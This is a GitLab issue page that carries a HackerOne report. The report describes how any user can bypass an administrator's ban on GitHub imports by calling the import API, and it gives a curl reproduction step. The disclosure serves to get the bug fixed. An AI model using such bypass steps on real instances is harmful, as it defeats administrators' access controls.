Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #27221
Closed
Open
Issue created Mar 08, 2019 by GitLab SecurityBot@gitlab-securitybotReporter

Github project import restriction bypass

HackerOne report #497975 by xanbanx on 2019-02-19, assigned to estrike:

A GitLab administrator can restrict the import sources and disable the Github import from the admin interface.

However, this restriction can be bypassed by any user by importing the Github project via the import API rather than using the web interface: https://docs.gitlab.com/ee/api/import.html#doc-nav

Steps To Reproduce:

Tested on a local installation of GitLab 11.8.0-pre (gitlab-ce@3dca5b307683e9f91941d6ddafaace6d856f8c7b)

  1. As the administrator, go to http://example.gitlab.com/admin/application_settings and disable the Github import source as shown in the screenshot below
  2. As a user named, e.g., user, perform the following API call:
curl --request POST --header "PRIVATE-TOKEN: <your-GL-Token> --data "personal_access_token=<GH-Token>&repo_id=1&target_namespace=user" https://example.gitlab.com/api/v4/import/github  
  1. Instead of raising an error message, the API correctly imports the repository from GitHub

Impact

The user bypasses the restriction of import sources setup by the administrator

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_20190219_141841.png
Assignee
Assign to
Time tracking